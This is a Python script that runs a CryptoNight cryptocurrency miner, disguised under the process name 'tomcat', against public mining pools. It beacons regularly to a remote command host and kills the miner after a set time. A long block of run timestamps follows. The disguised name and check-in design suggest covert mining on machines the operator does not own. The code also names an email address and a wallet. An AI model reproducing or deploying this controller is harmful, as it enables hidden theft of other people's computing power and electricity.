import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:51:01.990727
#2018-02-17 17:37:02.155155
#2018-02-17 19:25:06.840306
#2018-02-17 21:16:02.188144
#2018-02-17 22:59:04.115467
#2018-02-18 00:48:04.049190
#2018-02-18 02:37:04.418239
#2018-02-18 04:24:03.535464
#2018-02-18 06:16:05.790559
#2018-02-18 08:06:05.773408
#2018-02-18 09:53:06.628657
#2018-02-18 11:40:04.035094
#2018-02-18 13:25:03.176020
#2018-02-18 15:15:03.234300
#2018-02-18 17:04:01.703934
#2018-02-18 18:51:02.183919
#2018-02-18 20:38:02.150532
#2018-02-18 22:24:05.008946
#2018-02-19 00:13:04.435077
#2018-02-19 01:58:07.072134
#2018-02-19 03:45:06.492269
#2018-02-19 05:29:01.710758
#2018-02-19 07:16:05.151409
#2018-02-19 09:04:08.041291
#2018-02-19 10:52:02.001370
#2018-02-19 12:41:04.420582
#2018-02-19 14:28:02.103748
#2018-02-19 16:18:06.723985
#2018-02-19 18:06:01.408547
#2018-02-19 19:52:07.668308
#2018-02-19 21:39:04.871953
#2018-02-19 23:27:02.082734
#2018-02-20 01:13:05.649465
#2018-02-20 03:03:04.690986
#2018-02-20 04:49:06.860672
#2018-02-20 06:33:04.020563
#2018-02-20 08:18:03.768990
#2018-02-20 10:03:03.805674
#2018-02-20 11:47:07.874975
#2018-02-20 13:35:06.318688
#2018-02-20 15:19:01.452338
#2018-02-20 17:04:09.009768
#2018-02-20 18:51:02.236505
#2018-02-20 20:42:01.820589
#2018-02-20 22:27:01.618749
#2018-02-21 00:08:05.685387
#2018-02-21 01:53:06.642557
#2018-02-21 03:41:06.917765
#2018-02-21 05:28:07.156356
#2018-02-21 07:16:07.217594
#2018-02-21 09:01:04.762407
#2018-02-21 10:51:01.206394
#2018-02-21 12:39:05.801753
#2018-02-21 14:27:06.986372
#2018-02-21 16:14:01.947461
#2018-02-21 18:05:09.265751
#2018-02-21 19:53:01.414027
#2018-02-21 21:39:08.029978
#2018-02-21 23:25:08.847110
#2018-02-22 03:01:03.618449
#2018-02-22 04:47:06.193652
#2018-02-22 06:32:08.204203
#2018-02-22 08:19:02.131681
#2018-02-22 10:07:07.509346
#2018-02-22 11:53:02.225091
#2018-02-22 13:37:09.880373
#2018-02-22 15:27:01.250668
#2018-02-22 17:13:08.700389
#2018-02-22 18:58:08.658063
#2018-02-22 20:50:12.303851
#2018-02-22 22:35:01.346792
#2018-02-23 00:21:05.569277
#2018-02-23 02:09:05.308630
#2018-02-23 03:58:01.412660
#2018-02-23 05:45:08.604557
#2018-02-23 07:37:03.391297
#2018-02-23 09:39:04.439707
#2018-02-23 11:43:01.312804
#2018-02-23 13:32:05.989986
#2018-02-23 15:19:05.799299
#2018-02-23 17:06:07.346263
#2018-02-23 18:39:01.380168
#2018-02-23 20:16:07.162214
#2018-02-23 21:49:07.356085
#2018-02-23 23:27:04.651860
#2018-02-24 00:59:06.208094
#2018-02-24 02:46:08.077340
#2018-02-24 04:22:05.271106
#2018-02-24 06:09:02.028464
#2018-02-24 07:56:03.726707
#2018-02-24 09:40:04.658478
#2018-02-24 11:35:08.174640
#2018-02-24 13:25:05.939718
#2018-02-24 15:13:05.749365
#2018-02-24 17:02:01.661086
#2018-02-24 18:51:07.306793
#2018-02-24 20:41:01.371485
#2018-02-24 22:49:05.140368
#2018-02-25 02:09:06.906317
#2018-02-25 05:38:04.537753
#2018-02-25 11:35:01.770795